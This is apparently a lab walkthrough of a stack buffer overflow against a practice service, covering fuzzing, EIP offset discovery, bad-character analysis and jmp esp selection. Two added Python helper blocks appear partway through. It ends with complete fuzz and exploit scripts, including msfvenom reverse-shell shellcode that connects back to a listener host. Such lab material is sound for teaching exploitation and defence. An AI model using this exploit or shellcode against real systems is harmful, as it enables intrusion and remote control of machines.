
# Overflow1

### 1. Fuzz application to find number of bytes needed to crash the application

![](/files/1bQGtTaP0lpQi6vzqooa)

Bytes needed to crash application: 2000

### 2. Set mona configuration

`!mona config -set workingfolder c:\mona\%p`

![](/files/340JvRfyB8Bh7nRD8niL)

### 3. Find `EIP` offset

We first generate a cyclic pattern of 2000 bytes, matching the length of the string that crashed the server:

`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000`

![](/files/eSnUoFPAQVSbFRU1gvnJ)

Let's add this to the payload component of our `exploit.py`. Next, let's run `exploit.py`.

![](/files/lNzEeLTYXv6gLiAXyc7t)

Next, let's use the following command to find what is inside EIP.

`!mona findmsp -distance 2000`

![](/files/XCZKz16AMHJvX6NYMpRv)

Notice that the highlighted line says that the EIP offset is at 1978.

Let's change the EIP offset in `exploit.py` to 1978 and set our payload to "BBBB". If our EIP offset is correct, when the program crashes, EIP will contain "BBBB" which is 42424242.

![](/files/lC5ZO7p6dvLEbmJQPscf)

True enough, EIP contains 42424242. EIP offset: 1978
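As an added illustration (not part of the original write-up, and not mona's or Metasploit's own code), this Python reproduces the arithmetic behind step 3: it regenerates the `pattern_create.rb` sequence, reads a 4-byte overwrite the way the x86 CPU does (little-endian), and locates that value in the pattern the way `!mona findmsp` / `pattern_offset.rb` do. All function names are my own.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def ms_pattern(length):
    """Reproduce the Metasploit pattern_create.rb sequence: Aa0Aa1...Aa9Ab0...Ba0..."""
    out = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_value(chunk):
    """Four bytes that land on a saved return address are read by x86 little-endian,
    which is why "BBBB" shows up as 42424242 in EIP."""
    return struct.unpack("<I", chunk)[0]


def pattern_offset(pattern, eip):
    """Mirror of pattern_offset.rb / !mona findmsp: pack the EIP value back into
    bytes and look for those four characters in the pattern that was sent."""
    needle = struct.pack("<I", eip).decode("latin-1")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern; not a direct overwrite?")
    return idx


def return_address_bytes(addr):
    """Little-endian encoding of an address for the retn field of the payload."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    pat = ms_pattern(2000)
    # Pretend the crash put the pattern bytes at 1978..1981 into EIP.
    eip = register_value(pat[1978:1982].encode("latin-1"))
    print("EIP = 0x%08x, offset = %d" % (eip, pattern_offset(pat, eip)))
```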

### 4. Find bad characters

Let's generate a byte array in mona:

`!mona bytearray -b "\x00"`

We then add the output into our payload in `exploit.py` and run it.

Then we run `!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>`.

Notice that mona indicates that `\x07`, `\x08`, `\x2e`, `\x2f`, `\xa0` and `\xa1` are bad characters.

My guess is that the bad characters are `\x00\x07\x2e\xa0`. The reason is that usually the first bad character corrupts the memory, leaving the following character to be detected as a bad character by mona.

![](/files/SsgN6MWJYY8a4L6PSy21)

Let's test this out and remove `\x00\x07\x2e\xa0` from our payload.

![](/files/qYXvgAKorEaq9ttvpnYJ)

Hence, our bad characters are "`\x00\x07\x2e\xa0`"
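Added example, not code from the original page or from mona: this Python models what `!mona bytearray` and `!mona compare` do and encodes the heuristic used above, that within a run of consecutive flagged bytes only the first is genuinely bad and the rest are collateral, then re-checks with the reduced set as the write-up does. The `simulate_target` function is a constructed stand-in for the vulnerable service, not its real behaviour, and all names are my own.

```python
def bytearray_without(excluded):
    """Equivalent of `!mona bytearray -b`: every byte 0x00-0xff minus the excluded ones."""
    return bytes(b for b in range(256) if b not in excluded)


def simulate_target(sent, bad):
    """Constructed stand-in for the service (not OVERFLOW1's real behaviour): each bad
    byte and the byte right after it are clobbered to 0x00, producing the paired
    hits (07/08, 2e/2f, a0/a1) that the write-up saw in mona's output."""
    out = bytearray(sent)
    for i, b in enumerate(sent):
        if b in bad:
            out[i] = 0
            if i + 1 < len(out):
                out[i + 1] = 0
    return bytes(out)


def compare(sent, seen):
    """Byte-wise diff the way `!mona compare` reports it: the sent values that differ
    from what ended up in memory at ESP."""
    return [b for i, b in enumerate(sent) if i >= len(seen) or seen[i] != b]


def first_of_each_run(mismatches):
    """Heuristic from the write-up: in each run of consecutive mismatching byte
    values, keep only the first one as a candidate bad character."""
    firsts, prev = [], None
    for b in mismatches:
        if prev is None or b != prev + 1:
            firsts.append(b)
        prev = b
    return firsts


def confirmed_badchars(initial_excluded, bad_in_target):
    """Round 1: flag candidates; round 2: resend without them and confirm no mismatches.
    Returns (candidates, round2_mismatches)."""
    sent = bytearray_without(initial_excluded)
    candidates = first_of_each_run(compare(sent, simulate_target(sent, bad_in_target)))
    resend = bytearray_without(initial_excluded + bytes(candidates))
    return candidates, compare(resend, simulate_target(resend, bad_in_target))
```

An empty second-round mismatch list is the same confirmation the screenshot above gives; a non-empty one means one of the "collateral" bytes was genuinely bad and must be added.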

### 5. Find `jmp esp` instructions without any bad characters

`!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"`

![](/files/LcnyPI8IjT1V3FjG7OjX)

We can use the first one.

`Jmp esp` instruction address: `0x625011af`

So let's set the return address in our payload to "`\xaf\x11\x50\x62`" (the address `0x625011af` written in little-endian byte order, as x86 stores it).

### 6. Generate shellcode

`msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c`

![](/files/hHw0KUDvB0xP1AohOKKO)

Let's copy this into our payload component.

### 7. Set `nop` sled in padding

Let's set the nop sled in padding and run `exploit.py`.

![](/files/95KBX4wDeGd1buO23yV1)

### Final Payload

{% tabs %}
{% tab title="fuzz.py" %}

```python
import socket, time, sys

ip = "10.10.5.24"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
	try:
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.settimeout(timeout)
			s.connect((ip, port))
			s.recv(1024)
			print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
			s.send(bytes(string, "latin-1"))
			s.recv(1024)
	except:
		print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
		sys.exit(0)
	string += 100 * "A"
	time.sleep(1)
```

{% endtab %}

{% tab title="exploit.py" %}

```python
import socket

ip = "10.10.5.24"
port = 1337

prefix = "OVERFLOW1 "  ## command prefix the service expects (optional for other targets)
eip_offset = 1978  ## from !mona findmsp
overflow = "A" * eip_offset  ## filler up to the saved return address
retn = "\xaf\x11\x50\x62"  ## jmp esp at 0x625011af, written little-endian
padding = "\x90" * 24  ## nop sled in front of the shellcode
payload= ("\xdb\xd5\xd9\x74\x24\xf4\xbd\x0c\x1e\x6e\x67\x5a\x29\xc9\xb1"
"\x52\x31\x6a\x17\x03\x6a\x17\x83\xce\x1a\x8c\x92\x32\xca\xd2"
"\x5d\xca\x0b\xb3\xd4\x2f\x3a\xf3\x83\x24\x6d\xc3\xc0\x68\x82"
"\xa8\x85\x98\x11\xdc\x01\xaf\x92\x6b\x74\x9e\x23\xc7\x44\x81"
"\xa7\x1a\x99\x61\x99\xd4\xec\x60\xde\x09\x1c\x30\xb7\x46\xb3"
"\xa4\xbc\x13\x08\x4f\x8e\xb2\x08\xac\x47\xb4\x39\x63\xd3\xef"
"\x99\x82\x30\x84\x93\x9c\x55\xa1\x6a\x17\xad\x5d\x6d\xf1\xff"
"\x9e\xc2\x3c\x30\x6d\x1a\x79\xf7\x8e\x69\x73\x0b\x32\x6a\x40"
"\x71\xe8\xff\x52\xd1\x7b\xa7\xbe\xe3\xa8\x3e\x35\xef\x05\x34"
"\x11\xec\x98\x99\x2a\x08\x10\x1c\xfc\x98\x62\x3b\xd8\xc1\x31"
"\x22\x79\xac\x94\x5b\x99\x0f\x48\xfe\xd2\xa2\x9d\x73\xb9\xaa"
"\x52\xbe\x41\x2b\xfd\xc9\x32\x19\xa2\x61\xdc\x11\x2b\xac\x1b"
"\x55\x06\x08\xb3\xa8\xa9\x69\x9a\x6e\xfd\x39\xb4\x47\x7e\xd2"
"\x44\x67\xab\x75\x14\xc7\x04\x36\xc4\xa7\xf4\xde\x0e\x28\x2a"
"\xfe\x31\xe2\x43\x95\xc8\x65\x66\x63\x5f\x6a\x1e\x71\x5f\x84"
"\x82\xfc\xb9\xcc\x2a\xa9\x12\x79\xd2\xf0\xe8\x18\x1b\x2f\x95"
"\x1b\x97\xdc\x6a\xd5\x50\xa8\x78\x82\x90\xe7\x22\x05\xae\xdd"
"\x4a\xc9\x3d\xba\x8a\x84\x5d\x15\xdd\xc1\x90\x6c\x8b\xff\x8b"
"\xc6\xa9\xfd\x4a\x20\x69\xda\xae\xaf\x70\xaf\x8b\x8b\x62\x69"
"\x13\x90\xd6\x25\x42\x4e\x80\x83\x3c\x20\x7a\x5a\x92\xea\xea"
"\x1b\xd8\x2c\x6c\x24\x35\xdb\x90\x95\xe0\x9a\xaf\x1a\x65\x2b"
"\xc8\x46\x15\xd4\x03\xc3\x35\x37\x81\x3e\xde\xee\x40\x83\x83"
"\x10\xbf\xc0\xbd\x92\x35\xb9\x39\x8a\x3c\xbc\x06\x0c\xad\xcc"
"\x17\xf9\xd1\x63\x17\x28")  ## shellcode from msfvenom
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

try:
  ## the with-block closes the socket whether or not the send succeeds
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
  print("Could not connect.")
```

{% endtab %}
{% endtabs %}
